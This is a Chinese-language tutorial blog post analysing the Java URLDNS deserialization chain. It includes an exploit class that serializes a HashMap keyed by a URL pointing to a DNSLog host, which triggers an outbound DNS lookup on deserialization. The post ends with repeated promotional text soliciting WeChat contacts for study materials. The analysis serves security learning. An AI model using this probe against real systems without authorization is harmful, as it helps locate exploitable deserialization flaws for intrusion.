Java安全 URLDNS链分析，网络安全开发面试基础

this代表的是当前对象的指针，也可以用 this.name 的方式调用当前对象中的成员

那我们去URLStreamHandler类当中，查看下hashCode方法的代码

protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
if (addr != null) {
h += addr.hashCode();
} else {
String host = u.getHost();
if (host != null)
h += host.toLowerCase().hashCode();
}

// Generate the file part.
String file = u.getFile();
if (file != null)
h += file.hashCode();

// Generate the port part.
if (u.getPort() == -1)
h += getDefaultPort();
else
h += u.getPort();

// Generate the ref part.
String ref = u.getRef();
if (ref != null)
h += ref.hashCode();

return h;
}

我们看到 hashcode 方法接收一个URL类型的参数，然后对接收的 URL对象，也就是前面的key执行InetAddress addr = getHostAddress(u);，并会把求出的 hash值 返回给 URL对象中的hashCode属性（这里记住，下面有用到）

getHostAddress函数会对URL对象代表的链接进行DNS解析，获取其ip地址，我们使用 DNSLog 平台可以检测到该函数的访问

exp编写

思路整理

根据上面的链路分析，我们首先需要创建一个指向DNSLog平台链接的URL对象，然后作为键传入HashMap数组，最后将该数组进行序列化，然后反序列化调用其readObject方法，将URL对象赋值给key，然后使用hash方法处理URL对象，再调用URL对象的hashcode方法，然后以URL对象为参数，传入URLStreamHandler类的hashCode方法，对URL对象指向的链接进行访问

初步exp

现在的exp大体如下

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class URLDNS {
public static void main(String[] args) throws Exception {
HashMap map = new HashMap();
URL url = new URL(“http://j0obud.dnslog.cn/”);//这里替换为DNSLog平台分配的地址
map.put(url,“114”);//键值用不到，随便设置
try {
FileOutputStream outputStream = new FileOutputStream(“./2.ser”);
ObjectOutputStream outputStream1 = new ObjectOutputStream(outputStream);
outputStream1.writeObject(map);
outputStream.close();
outputStream1.close();
FileInputStream inputStream = new FileInputStream(“./2.ser”);
ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
objectInputStream.readObject();
objectInputStream.close();
inputStream.close();
}catch (Exception e){
e.printStackTrace();
}
}
}

我们在第13行打个断点，也就是try的这一行

然后运行代码，发现未经序列化与反序列化仍然能对url进行DNS解析

正是下面这一行代码导致了url的提前解析

map.put(url,“114”);//键值用不到，随便设置

我们去看下map(HashMap类)的put方法，代码如下

public V put(K key, V value) {
return putVal(hash(key), key, value, false, true);
}

我们发现，这个put方法和readObject方法触发的语句完全一样，同样会对URL对象执行HashMap类中的hash方法，然后就和上文所述的过程相同，最总到达hashCode方法，对URL对象解析

return putVal(hash(key), key, value, false, true);

下面是这两个方法的语句对比可以看到是一模一样的

put方法：

readObject方法：

需要注意的是假如提前触发的话，反序列化的时候便不会再进行DNS解析

我们再次回到URL类中的hashCode方法，并看一下其hashCode属性的定义

private int hashCode = -1;
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;
}

可以看到只有当 hashCode = -1时，才会执行hashCode = handler.hashCode(this);，从而到下一步DNS解析，然后 hashCode属性被赋值为这个URL解析的哈希值，从而为一个很长的正数，从而不为 -1,然后序列化的时候这个hashCode属性值保持不变，当反序列化到hashCode方法时，以为 hashCode != -1 直接进入if，执行return hashCode;，最终到这里就断掉了，无法触发DNS解析

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

写在最后

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。**

需要完整版PDF学习资源私我

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-oUDaCWLg-1712498457109)]